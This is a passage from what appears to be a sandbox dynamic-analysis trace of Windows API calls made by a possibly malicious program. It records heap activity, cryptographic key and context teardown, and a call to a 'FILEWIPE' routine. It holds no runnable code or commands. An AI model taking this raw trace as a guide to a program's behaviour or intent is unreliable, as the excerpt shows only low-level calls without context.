pdwDataLen=0x87e820*=0xc1f0) returned 1 [0192.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.302] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0192.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.302] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.302] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.302] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0192.302] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.302] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.302] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.303] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0192.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.311] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0192.311] TranslateMessage (lpMsg=0x87f36c) returned 0 [0192.311] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0192.312] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0192.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.312] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0192.312] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0192.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.312] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0192.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.312] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.312] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.313] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0192.313] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.313] CryptDestroyKey (hKey=0x90af18) returned 1 [0192.313] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.313] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.313] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.313] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.313] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.313] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.313] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.314] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0192.314] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0192.314] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.314] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.314] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.314] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.314] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.314] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.314] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.315] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.315] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.315] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.315] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0192.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.315] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.315] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.315] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0192.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0192.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0192.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0192.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0192.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0192.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.317] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0192.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.317] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0192.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.317] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0192.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.318] FreeLibrary (hLibModule=0x74f20000) returned 1 [0192.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0192.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0192.318] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0192.318] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.318] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.318] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.319] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0192.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0192.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.321] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0192.321] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0192.321] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.321] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, 